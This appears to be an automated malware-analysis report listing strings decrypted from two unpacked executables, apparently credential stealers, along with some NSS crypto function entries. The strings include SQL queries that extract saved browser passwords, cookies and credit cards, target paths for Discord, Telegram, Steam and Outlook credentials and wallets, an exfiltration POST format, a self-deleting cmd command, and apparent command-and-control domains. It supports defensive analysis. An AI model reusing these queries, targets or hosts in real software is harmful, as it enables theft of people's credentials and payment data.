Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CryptUnprotectData
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SHGetFolderPathA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ShellExecuteExA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: InternetOpenUrlA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: InternetConnectA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: InternetCloseHandle
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HttpSendRequestA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HttpOpenRequestA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: InternetReadFile
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: InternetCrackUrlA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: StrCmpCA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: StrStrA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: StrCmpCW
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: PathMatchSpecA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RmStartSession
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RmRegisterResources
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RmGetList
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RmEndSession
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_open
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_step
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_column_text
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_finalize
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_close
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3_column_blob
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: encrypted_key
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: PATH
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: NSS_Init
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: NSS_Shutdown
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: PK11_FreeSlot
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: PK11_Authenticate
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: C:\ProgramData\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: browser:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: profile:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: url:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: login:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: password:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Opera
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: OperaGX
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Network
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: cookies
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: .txt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: TRUE
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: FALSE
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: autofill
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: history
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: cc
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: name:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: month:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: year:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: card:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Cookies
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Login Data
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Web Data
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: History
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: logins.json
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: formSubmitURL
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: usernameField
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: encryptedUsername
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: encryptedPassword
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: guid
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: cookies.sqlite
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: formhistory.sqlite
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: places.sqlite
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: plugins
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Local Extension Settings
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Sync Extension Settings
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: IndexedDB
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Opera Stable
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Opera GX Stable
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CURRENT
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: chrome-extension_
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Local State
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: profiles.ini
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: chrome
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: opera
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: firefox
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: wallets
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ProductName
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: x32
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: x64
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DisplayName
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DisplayVersion
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Network Info:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - IP: IP?
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Country: ISO?
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: System Summary:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - HWID:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - OS:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Architecture:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - UserName:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Computer Name:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Local Time:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - UTC:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Language:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Keyboards:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Laptop:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Running Path:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - CPU:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Threads:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Cores:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - RAM:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - Display Resolution:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: - GPU:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: User Agents:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Installed Apps:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: All Users:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Current User:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Process List:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: system_info.txt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: freebl3.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: mozglue.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: msvcp140.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: nss3.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: softokn3.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: vcruntime140.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Temp\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: .exe
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: runas
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: open
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: /c start
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %DESKTOP%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %APPDATA%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %USERPROFILE%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %DOCUMENTS%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %RECENT%
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: *.lnk
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: files
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \discord\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Telegram Desktop\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: key_datas
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: map*
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Telegram
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Tox
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: *.tox
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: *.ini
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Password
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 00000001
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 00000002
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 00000003
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 00000004
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Pidgin
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \.purple\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: accounts.xml
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: token:
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Software\Valve\Steam
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SteamPath
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \config\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ssfn*
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: config.vdf
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DialogConfig.vdf
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: libraryfolders.vdf
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: loginusers.vdf
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Steam\
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sqlite3.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: done
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: soft
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: https
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: POST
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HTTP/1.1
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: hwid
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: build
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: token
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: file_name
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: file
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: message
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: screenshot.jpg
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: hummskitnj.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: cashfuzysao.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: appliacnesot.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: screwamusresz.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: inherineau.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: scentniej.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: rebuildeso.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: prisonyfork.buzz
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: undesirabkel.click
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: - Screen Resoluton:
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: Workgroup: -
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	String decryptor: LPnhqo--ijcujmprgili

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C58A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6C58A9A0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C584440 PK11_PrivDecrypt,	3_2_6C584440
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C554420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	3_2_6C554420
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5844C0 PK11_PubEncrypt,	3_2_6C5844C0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5D25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	3_2_6C5D25B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C58A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	3_2_6C58A650
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C568670 PK11_ExportEncryptedPrivKeyInfo,	3_2_6C568670
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C56E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	3_2_6C56E6E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5AA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	3_2_6C5AA730
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5B0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	3_2_6C5B0180
